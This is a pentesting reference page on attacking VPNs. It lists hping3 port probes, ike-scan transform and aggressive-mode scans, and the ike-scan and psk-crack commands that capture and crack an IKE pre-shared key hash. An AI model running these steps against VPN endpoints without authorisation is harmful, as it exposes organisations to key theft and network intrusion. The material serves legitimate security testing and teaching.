Pentesting

Attacking VPNs

The VPNs Hacker's Toolkit

  • IPsec tools: Used for building IPsec tunnels

  • IKE-scan: An IKE probing utility

  • PSK-crack: A tool for cracking PSKs used by IKE

  • OpenSSL: Client-server tools for SSL/TLS negotiations

  • VPN clients

VPN Hacking Methodology

  1. Identify the VPN technology in use

  2. Establish initial communications with the server; identify the authentication methods and encryption method in use

  3. Perform a "handshake" with the server and look for information leaks.

  4. Identify vulnerabilities for exploitation using leaked information.

Crafting Hping3 commands

# Send SYN packets 
hping3 -S -p 53 <TargetIP>

# Send UDP packets to port 500 (used by IKE)
hping3 --udp -p 500 <TargetIP>

# Bash scripts that takes udp.txt and sends probes to each UDP port number listed
for port in `cat udp.txt`; do echo TESTING UDP PORT: $port; hping3 -2- p $port -c 1 <TargetIP>; done

IKE-scan

  • IKE-scan attempts to communicate using the IKE protocol

# IKE-scan
# Uses defaults: 3DES encryption, SHA1 Hash, PSK Authentication, DH Group 2
ike-scan <TargetIP>

# Default SAs
ike-scan --trans=5,2,1,2 <TargetIP>

# This command will use the following:
# DES-CBD Encryption, MD5 Hash, PSK Auth, DH Group 1
ike-scan --trans=1,1,1,1 <Target IP>

# Newer method for specifying transforms
ike-scan --trans="(1=5,2=2,3=1,4=2)" <TargetIP>

# Runs scan in aggressive mode
ike-scan -A <TargetIP>

# If aggressive return a Auth=PSK response then it might be vulnerable. 
# Attempt to extract the key 
ike-scan -A <TargetIP> --pskcrack=pskhash

# If previous command works you will have a file named pskhash
# Attempt to crack the hash
psk-crack pskhash

IKEmulti

  • ikemulti.py tries multiple transforms

# Running ikemulti.py 
python ikemulti.py -i <TargetIP>

Aggressive Mode

  • Main mode can be thought of as a normal way of exchanging information

  • Aggressive mode is designed to speed up the process and perform a faster handshake

    • Aggressive mode can leak information

    • If this mode is used with a PSK the key itself can actually be extracted and then cracked before being used to authenticate

PreviousAttacking KerberosNextDenial of Service

Last updated